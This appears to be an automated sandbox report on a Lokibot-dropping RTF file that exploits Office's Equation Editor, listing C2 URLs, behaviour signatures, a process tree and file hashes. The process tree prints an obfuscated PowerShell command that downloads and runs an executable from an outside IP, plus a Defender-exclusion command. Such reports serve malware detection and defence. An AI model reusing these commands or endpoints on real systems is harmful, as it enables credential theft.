Analysis

  • max time kernel
    96s
  • max time network
    97s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    20-11-2024 10:07

General

  • Target

    seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf

  • Size

    251KB

  • MD5

    e6859034a42f217800b6bf0980e93848

  • SHA1

    8dcb69dcf727b7a7fbfbf6755492990dc51fd192

  • SHA256

    564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1

  • SHA512

    778ceefc76571268a7c82c18ec1b6f6661b4f696d2612528b8eb94488383c84c9dba6613cd5b1c715514e64d062d73d28d84395f30dadb4fd2da51cbac372d35

  • SSDEEP

    3072:sUcN1DaxXp1sAkC5gCQqCv7L5FokmFJcmrmR3D:slruZ1sA55gCQBL5FokmFyCmR3D

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.41/maxzi/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2172
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Blocklisted process makes network request
      • System Location Discovery: System Language Discovery
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2804
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"
        2⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2816
        • C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe
          "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
          3⤵
          • Blocklisted process makes network request
          • Evasion via Device Credential Deployment
          • Loads dropped DLL
          • Drops file in System32 directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2792
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
            4⤵
            • Evasion via Device Credential Deployment
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:668
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\curq-f5c.cmdline"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2160
            • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4442.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4441.tmp"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2384
          • C:\Users\Admin\AppData\Roaming\wininit.exe
            "C:\Users\Admin\AppData\Roaming\wininit.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2680
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2272
            • C:\Users\Admin\AppData\Roaming\wininit.exe
              "C:\Users\Admin\AppData\Roaming\wininit.exe"
              5⤵
              • Executes dropped EXE
              PID:2216
            • C:\Users\Admin\AppData\Roaming\wininit.exe
              "C:\Users\Admin\AppData\Roaming\wininit.exe"
              5⤵
              • Executes dropped EXE
              • Accesses Microsoft Outlook profiles
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:2316

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RES4442.tmp

      Filesize

      1KB

      MD5

      37a082c418019dab90c73c62b2f491ac

      SHA1

      f4bb4f3c092bb532bafa9e8cee0b62ba1ee08b9d

      SHA256

      448fb02400e6a4130e93391e3382889fa27652a2a55e0aabbfbbcb2cd4a0b4f9

      SHA512

      bc027163ea30d0172c749d4cbcb45991c311a750222c3c3ce1dea8787de49cfc911f7a3050fe673a816845c8de0be169789c0f54c2d8316dc680095d6d4db513

    • C:\Users\Admin\AppData\Local\Temp\curq-f5c.dll

      Filesize

      3KB

      MD5

      9741027684526df318fb6cbc34152270

      SHA1

      e6da86e69f250a0f4264485271411f8dc0eb6d42

      SHA256

      bf9814b102c69336758a1c1ecca01d17a4668c8eaffdf8c5ce8dfe14029bd77c

      SHA512

      ec37a8205b3eda5c6c1195b5488b7d627e100af9c8e0851ea6d052a4301d3871047199b29334e4a2def39630d834627d2e601f4391333a506b726fd4fb23c910

    • C:\Users\Admin\AppData\Local\Temp\curq-f5c.pdb

      Filesize

      7KB

      MD5

      b070ed12fb29d73958e9d02a423bcadc

      SHA1

      1413372a191113d7c3294216c865d5e44981fa5f

      SHA256

      990a34da9770d2d6bc45bb415577b080f9367d66d9c770def95f73a908937c6c

      SHA512

      89c437de87d72b61fafcc5a3a327b41070a795731de5a66e8ba6b383e53ecc66060de82bb3a4fb72f677fc8dd449cf5f0ceac2c738b6d40a8d770208d3642664

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2703099537-420551529-3771253338-1000\0f5007522459c86e95ffcc62f32308f1_4b15cc6c-8bd6-4727-90f6-cf303c4bde6d

      Filesize

      46B

      MD5

      d898504a722bff1524134c6ab6a5eaa5

      SHA1

      e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

      SHA256

      878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

      SHA512

      26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2703099537-420551529-3771253338-1000\0f5007522459c86e95ffcc62f32308f1_4b15cc6c-8bd6-4727-90f6-cf303c4bde6d

      Filesize

      46B

      MD5

      c07225d4e7d01d31042965f048728a0a

      SHA1

      69d70b340fd9f44c89adb9a2278df84faa9906b7

      SHA256

      8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

      SHA512

      23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      03e17db36bc1693d064de4cf63581457

      SHA1

      3465c05785b085f1ed6b679ae9c3e312e0008063

      SHA256

      69e2b7a3c968300d3602965071212566f642ae6029df19941c1117e1233ea5a2

      SHA512

      6381e686e3e298a8485f9baa9c76a2cdc11fae302c4ab67204c094a8a5cc98bae463cf8119aa975ccf732bc52e11955e985a971fc4fae9ccb0ee1002da8be4bb

    • C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta

      Filesize

      23KB

      MD5

      ec0d423a3f72d69975a1e31a275f5377

      SHA1

      213922fb8456ecaadc24889afec1ac6ef5010c68

      SHA256

      9fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac

      SHA512

      8132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad

    • C:\Users\Admin\AppData\Roaming\wininit.exe

      Filesize

      586KB

      MD5

      66b03d1aff27d81e62b53fc108806211

      SHA1

      2557ec8b32d0b42cac9cabde199d31c5d4e40041

      SHA256

      59586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4

      SHA512

      9f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d

    • \??\c:\Users\Admin\AppData\Local\Temp\CSC4441.tmp

      Filesize

      652B

      MD5

      5091533375d13f175bab9e33d32d0746

      SHA1

      6c2fe722c6f49941fef8587731a5b75a6d741240

      SHA256

      9723e2318ca7bbbe283986e88c6e7a9f56c5ecde31fec1bd9f86b3056faf1433

      SHA512

      3a851023e7af7b5cc6e9b453ffe8e487615614a258beb6daf682cfd97e117a0361f67ae15fa91a46d211a385f6915b0dac17aca2cc974c0db8c0956856627b65

    • \??\c:\Users\Admin\AppData\Local\Temp\curq-f5c.0.cs

      Filesize

      480B

      MD5

      b0517586f4097114e790c61f2685f0d5

      SHA1

      20f7482298ab96731228ebd5242ceddfd72ff50f

      SHA256

      a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237

      SHA512

      c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0

    • \??\c:\Users\Admin\AppData\Local\Temp\curq-f5c.cmdline

      Filesize

      309B

      MD5

      1f11c4bfa922eee65bf95da0ed33f809

      SHA1

      1841382b9d8c7faf90eb0428d6b730659b30cb87

      SHA256

      7657cc7a09fbf56f1399a8a8e8cd802b5e9c646da408eb01a02f32728ad3c341

      SHA512

      89908271f1858328d66f1ba132d61a1719f2e6c29b2d2cbfe32938aff7510a64063d348a3292c5f68dae8a5c34beb3d9e4fc9c0e3161b33f1262f1142704fa7a

    • memory/2316-64-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2316-62-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2316-98-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2316-90-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2316-51-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2316-53-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2316-55-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2316-57-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2316-59-0x0000000000400000-0x00000000004A2000-memory.dmp

      Filesize

      648KB

    • memory/2316-61-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

    • memory/2324-0-0x000000002FB61000-0x000000002FB62000-memory.dmp

      Filesize

      4KB

    • memory/2324-47-0x00000000713BD000-0x00000000713C8000-memory.dmp

      Filesize

      44KB

    • memory/2324-2-0x00000000713BD000-0x00000000713C8000-memory.dmp

      Filesize

      44KB

    • memory/2324-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2680-46-0x0000000000190000-0x0000000000228000-memory.dmp

      Filesize

      608KB

    • memory/2680-49-0x00000000051A0000-0x0000000005204000-memory.dmp

      Filesize

      400KB

    • memory/2680-48-0x0000000000510000-0x0000000000522000-memory.dmp

      Filesize

      72KB